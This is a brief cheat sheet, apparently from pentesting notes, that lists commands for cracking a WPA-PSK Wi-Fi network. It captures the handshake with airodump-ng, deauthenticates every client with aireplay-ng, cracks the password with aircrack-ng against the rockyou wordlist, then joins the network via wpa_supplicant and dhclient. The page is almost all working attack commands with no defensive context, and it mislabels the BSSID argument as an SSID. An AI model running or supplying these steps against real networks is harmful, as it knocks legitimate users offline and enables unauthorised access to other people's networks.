WPA-PSK
List the target:
sudo airodump-ng wlan0
airodump-ng --bssid <Target_SSID> --channel <channel_number> --write wpa_psk_handshake wlan0
deauth all client:
aireplay-ng -0 5 -a <Target_SSID> wlan0
crack the handshake:
aircrack-ng wpa_psk_handshake.cap -w /usr/share/wordlist/rockyou.txt
How to connect via terminal:
generate the config
wpa_passphrase <Target-Name> <Password> > wpa_psk.conf
connect to the ssid
sudo wpa_supplicant -B -i wlan0 -c ./wpa_psk.conf
obtain the IP Address
sudo dhclient wlan0
Bonus:
How to stop wpa_supplicant:
systemctl stop wpa_supplicant
Last updated